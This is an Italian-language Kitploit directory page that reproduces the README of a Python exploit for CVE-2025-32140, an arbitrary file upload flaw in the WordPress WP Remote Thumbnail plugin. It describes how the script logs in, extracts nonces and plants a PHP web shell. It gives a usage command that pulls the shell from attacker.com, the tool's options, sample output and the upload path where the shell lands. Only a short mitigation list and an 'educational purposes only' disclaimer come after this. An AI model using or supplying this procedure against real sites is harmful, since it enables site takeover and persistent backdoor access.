Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32140 — WordPress WP Remote Thumbnail Plugin <= 1.3.2 è vulnerabile al Caricamento Arbitrario di File. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-32140
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-32140

CVE-2025-32140

WordPress WP Remote Thumbnail Plugin <= 1.3.2 è vulnerabile al Caricamento Arbitrario di File.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2025-32140 – Exploit WP Remote Thumbnail (Caricamento Arbitrario di File)


📝 Descrizione

CVE-2025-32140 è una vulnerabilità critica nel plugin WP Remote Thumbnail per WordPress. Consente a attaccanti autenticati (con permessi di collaboratore o superiori) di caricare file arbitrari, come web shell, abusando di una funzionalità difettosa che accetta URL non sanificati.

Il plugin non convalida il tipo di file o il contenuto recuperato dall'URL remote_thumb fornito. Ciò consente agli attaccanti di salvare file PHP malevoli (ad esempio, backdoor) nella directory /wp-content/uploads.


⚠️ Componente Vulnerabile

  • Plugin: WP Remote Thumbnail
  • Versioni Vulnerabili: <= 1.3.2
  • Versione Corretta: Non ancora rilasciata
  • Vettore di Attacco: Rete
  • Privilegi Richiesti: Basso (Utente autenticato con capacità edit_post)
  • Punteggio CVSS: 9.9 (Critico)

🛠 Script di Exploit

Questo script Python automatizza lo sfruttamento di CVE-2025-32140, eseguendo i seguenti passaggi:

  1. Effettua l'accesso al sito WordPress target.
  2. Estrae automaticamente i nonce richiesti.
  3. Crea e invia una richiesta malevola tramite il parametro remote_thumb.
  4. Carica una web shell sul sito target.

🔧 Opzioni da riga di comando

OpzioneAliasDescrizione
--url-uURL del sito WordPress target (es. http://target.com/wordpress)
--username-unNome utente WordPress con privilegi di modifica dei post
--password-pPassword per il nome utente specificato
--user_ID-uidID utente WordPress (di solito 1 per l'amministratore)
--post_ID-pidID del post da modificare (può essere una bozza)
--shellURL diretto a una web shell PHP ospitata sul server dell'attaccante

🚀 Utilizzo

python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 Utilizzo e Aiuto


                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 Output di Esempio

[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 Posizione della Shell

Una volta sfruttato, la web shell caricata sarà probabilmente memorizzata in:

http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

Sostituisci YYYY/MM con l'anno e mese correnti del caricamento.


🛡 Raccomandazioni

Per mitigare il rischio posto da questa vulnerabilità:

  1. Aggiorna il plugin all'ultima versione (una volta rilasciata una correzione).
  2. Limita le capacità di caricamento file a soli utenti fidati.
  3. Disabilita la funzionalità di recupero remoto delle miniature se non necessaria.

⚠️ Dichiarazione di non responsabilità

Questo script è fornito solo a scopo educativo.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo exploit.


👤 Autore

Di: Nxploited ( Khaled Alenazi ) 🌟

Scarica lo strumento